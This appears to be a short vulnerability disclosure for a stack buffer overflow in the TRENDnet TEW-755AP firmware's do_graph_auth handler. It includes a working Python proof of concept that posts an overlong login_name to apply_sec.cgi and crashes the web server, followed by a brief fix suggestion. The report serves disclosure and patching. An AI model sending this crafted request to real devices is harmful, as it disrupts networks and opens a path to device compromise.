We found a stack buffer overflow vulnerability at **TEW-755AP (**Firmware version TEW755AP-FW113B01.bin).

In the handler function for action do_graph_auth (sub_4061E0) of the file /www/cgi/ssi, the value of login_name is directly copied to stack buffer without size check. An attacker can overflow the stack buffer by specifying login_name as a very long string.

PoC

import requests

url = "<http://192.168.17.221:80/apply_sec.cgi>"
cookie = {"Cookie":"uid=1234"}
data = {'action' : "do_graph_auth",
"login_name" : "a"*(0xc50-48)}
response = requests.post(url, cookies=cookie, data=data)
print(response.text)
print(response)

We use python to send a crafted HTTP post request to the web server, and print out the return message.

Send the crafted HTTP request to the server, it will return 502 error code.

Fix Suggestion:

Use strncpy to perform avoid buffer overflow